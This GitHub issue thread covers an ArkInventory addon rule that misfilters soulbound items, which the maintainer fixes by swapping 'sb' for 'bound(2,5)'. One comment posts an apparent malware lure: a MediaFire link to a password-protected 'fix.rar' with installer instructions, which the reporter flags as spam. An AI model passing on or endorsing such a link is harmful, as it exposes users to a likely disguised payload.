### ISSUE TITLE
[BUG] soulbound state

### ISSUE THREAD

**Issue by mrbryo** [arkayenro/arkinventory#1995]
**What version number you are using?**
31100

**What game client are you playing? Retail, Wrath, Classic / Live, PTR, Beta**
Retail

**What language is the game client set to?**
English

**Describe the bug**
Rule is picking up sb:3 items when the rule doesn't include it. Also rule indicates sb:5 but it the rule is not getting assigned.

**To Reproduce**
Steps to reproduce the behavior, if possible:

Create a rule with the following and assign it to a bar:
Order:310
Description: Unbound Gear
Formula: type(2,4) and sb(2,5)

I expect it to resolve both type and sb to assign the rule to the item. And based on the debug menu of items the following values are used:

- sb
-- 2 = binds when equipped
-- 5 = warbound until equipped
- type
-- 2 = weapon
-- 4 = armor

On another bar assign: System > Equipment (Soulbound)

With rule disabled then items group as expected. When rule enabled all soulbound moves.

**Screenshots**

Rule Disabled
![image](https://github.com/user-attachments/assets/3167ef9e-b87a-456e-995a-7101a6ab0bd8)

Rule Enabled
![image](https://github.com/user-attachments/assets/61627c44-2f5c-4871-be25-04edb6ecc0ce)

Rule Not Assigned to Item
![image](https://github.com/user-attachments/assets/6366bf6b-0be8-4d6b-b752-5756e6018da7)

**Additional context**
Nothing to add here.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mrbryo** [comment]
tonywk your response seems to be spam-like or hacked account maybe and will not just download a file.

**Comment by arkayenro** [comment]
update tot he latest alpha version, pretty sure its fixed in there

**Comment by mrbryo** [comment]
Oh geez, just noticed I didn't set the subject properly, sorry for that, hah. Went to the alpha but then a different rule broke. But I installed your latest release and my warband rule is working again.

When the addon reads the rule its: ((type is 2 or 4) and (soulbound is 2 or 5)); is my understanding correct?

Not sure I need this rule now since I can just assign System > Equipment and System > Equipment (warbound) instead. That is working I think as expected.

**Comment by arkayenro** [comment]
youd have to paste the actual rule formula from the rule you have.

**Comment by mrbryo** [comment]
type(2,4) and sb(2,5)

**Comment by arkayenro** [comment]
`type(2,4) and bound(2,5)`

`sb` ignores any values you give it, its just a boolean for is the item soulbound or not

**Comment by mrbryo** [comment]
ah! ok thank you
